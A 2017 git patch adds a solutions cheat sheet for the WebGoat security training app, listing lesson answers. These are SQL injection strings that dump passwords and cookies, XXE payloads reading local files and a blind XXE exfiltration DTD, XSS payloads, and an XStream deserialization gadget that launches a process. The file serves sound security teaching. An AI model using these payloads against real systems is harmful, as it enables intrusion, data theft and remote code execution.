From 153dc57731a35cad9023dda62e85fc5d879f14b5 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Fri, 17 Feb 2017 16:18:57 -0500
Subject: [PATCH] Basic solutions cheat file for now

---
 webgoat-lessons/sol.txt | 88 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 88 insertions(+)
 create mode 100644 webgoat-lessons/sol.txt

diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
new file mode 100644
index 000000000..9b1c2c0aa
--- /dev/null
+++ b/webgoat-lessons/sol.txt
@@ -0,0 +1,88 @@
+### SQLi ###
+Basic
+Smith  - to show it returns smith's records
+Smith' or '1'='1    - to show exploit; 1=1 can be any true clause
+
+[2:19 PM]  
+101
+101 or 1=1
+
+Smith' union select userid,user_name, password,cookie,cookie, cookie,userid from user_system_data --
+
+## XXE ##
+
+Simple - <?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+
+Modern Rest Framework - change content type to: Content-Type: application/xml && 
+<?xml version="1.0" standalone="yes" ?><!DOCTYPE user [<!ENTITY root SYSTEM "file:///"> ]><user>  <username>&root;</username><password>test</password></user>
+
+Blind SendFile ...
+
+    /**
+     * Solution:
+     *
+     * Create DTD:
+     *
+     * <pre>
+     *     <?xml version="1.0" encoding="UTF-8"?>
+     *     <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
+     *     <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=%file;'>">
+     *      %all;
+     * </pre>
+     *
+     * This will be reduced to:
+     *
+     * <pre>
+     *     <!ENTITY send SYSTEM 'http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]'>
+     * </pre>
+     *
+     * Wire it all up in the xml send to the server:
+     *
+     * <pre>
+     *  <?xml version="1.0"?>
+     *  <!DOCTYPE root [
+     *  <!ENTITY % remote SYSTEM "http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd">
+     *  %remote;
+     *   ]>
+     *  <user>
+     *    <username>test&send;</username>
+     *  </user>
+     *
+     * </pre>
+     *
+     */
+
+###XSS ###
+
+<script>alert('my javascript here')</script>4128 3214 0002 1999
+
+DOM-XSS ...
+
+// something like ... http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere%3Cscript%3Ewebgoat.customjs.phoneHome();%3C%2Fscript%3E
+// or http://localhost:8080/WebGoat/start.mvc#test/testParam=foobar&_someVar=234902384lotslsfjdOf9889080GarbageHere<script>webgoat.customjs.phoneHome();<%2Fscript>
+
+
+### Vuln - Components ###
+
+Jquery page:  - it is contrived; but paste that in each box
+OK<script>alert("XSS")<\/script>
+OK<script>alert("XSS")<\/script>
+
+for the deserialization:  got to the link: http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/  to read about why it works so you can talk to it.
+
+<sorted-set>  
+ <string>foo</string>
+ <dynamic-proxy>
+   <interface>java.lang.Comparable</interface>
+   <handler class="java.beans.EventHandler">
+     <target class="java.lang.ProcessBuilder">
+       <command>
+         <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
+       </command>
+     </target>
+     <action>start</action>
+   </handler>
+ </dynamic-proxy>
+</sorted-set>
+
+